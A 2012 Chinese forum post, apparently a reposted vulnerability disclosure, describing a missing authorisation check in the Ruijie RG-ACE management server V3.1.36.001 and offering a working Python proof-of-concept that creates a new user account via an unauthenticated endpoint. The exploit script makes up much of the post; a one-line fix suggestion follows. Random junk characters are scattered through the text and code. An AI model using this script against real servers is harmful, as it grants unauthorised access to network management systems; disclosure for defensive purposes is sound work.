找回密码
 立即注册
查看: 3051|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
* N) p& C. z' g) j& G7 r+ B
$ z% I2 J+ U  _; D& ?- p: s5 ~2 ^" c6 p' _! \3 l2 h
测试的具体版本是+ }: N7 |. H8 K
产品名称: 锐捷应用控制引擎
' i" p. [" Y5 F$ K; Z) S& x5 n版本号: 3.1.36.001 TC7 b: ?+ a5 T2 r/ P+ w* x2 `# z
编译时间: 201104291730
* j( `3 M7 Q% n 4 p* N/ ~# N: \$ U, s  f  [% t

2 i8 g5 \& }" j' M; ]8 B! Q漏洞证明:+ l# t) L- m7 H3 v% n

& t& n6 Z7 {/ w2 h2 E3 m$ E9 ^9 w$ |2 S
) f' a/ X- \. O& C4 \6 V2 b; l% L6 m) @: f5 O: V) N

  m5 Y: |, @1 n6 L$ S; |" x+ {0 ^
+ d/ q: Z3 J2 X0 ?! H+ F$ o$ k
执行脚本
! y- ?, h& I  p/ @+ i0 g# s#! /usr/bin/env python4 I! C7 R' C- N$ D2 ?
#coding=gbk2 ^# o6 J& M0 c
#RG-ACE管理服务器 V3.1.36.001
" G+ o1 |) T) F1 I/ ^* n5 j* rimport urllib2, urllib,cookielib
5 ]0 |/ u8 D: s+ e( G6 ~3 murl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
4 Y+ u# C+ c( o8 Bopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))  F2 O8 ~0 c4 U8 B# ^; }9 j
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
: [& @' U% f- d! ]; c" y- Spost=(("event","userManager.doInsertUserInfo"),
$ d2 h( _7 d% T9 P("useractionname","addButtonValue"),6 a+ d& T2 \) C% T5 n
("useropermanager","userManager"),) b3 N! s* f+ x5 a
("userName","t"), #######账号自己加
5 F8 H+ k$ O0 X1 \; I2 E/ W9 X("pwd","aaaaaa"),######密码自己加0 m! \; ]9 U, q" _! ?/ Q0 S, l
("trueName","ad"),
$ o# t/ o8 A& F: D, l("email",""),
4 l  b8 H. ?/ Y; T("mobilePhone",""),8 j+ h& ^9 I1 |. V; p& o$ X9 x
("officePhone",""),# _2 R  }! L/ V: `0 m% u
("addr",""),! |8 p9 _' @. E1 \5 }
("submit","确定"))9 o7 B5 c, R  y
urllib2.install_opener(opener)
, E% D/ H  j  F3 F( Z% V4 C% \. P! Wp=urllib2.urlopen(url, urllib.urlencode(post)).read()4 B/ w2 e' q, M5 h+ {& A
print "Done"
: p  G2 H' z/ o0 f& @) j* c* x0 k3 d+ Z8 W1 L
登录,连接设备) F5 o1 X4 v. \9 y* Z
/ D- j5 P6 b" F2 B
& m, u$ x/ `, \! {

" R: z3 u0 _1 ]2 m1 b1 ^4 v
  u  e1 w, i- C! w: R2 B) Y4 B" ~0 U3 L- H+ E8 [& ]0 V6 x
默认的管理员admin权限更大点
1 c! S9 y+ b5 }% E7 u0 D5 z, Q( v% Y: ?
( u& }! w  q3 [6 t/ z1 `0 U( w1 k
* w  r( }# c& D/ Q$ x/ ^$ x* i
9 |# E' J3 G% L/ E, `
! Y6 Y. y. Q& v3 J0 J' S
修复方案:
; Q1 i8 O) i1 j+ g& ]9 T9 J7 j加强对接口的权限验证4 _- R, _9 X" `0 I# x* F6 V* B7 B
8 {& ~8 d# `" C. U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表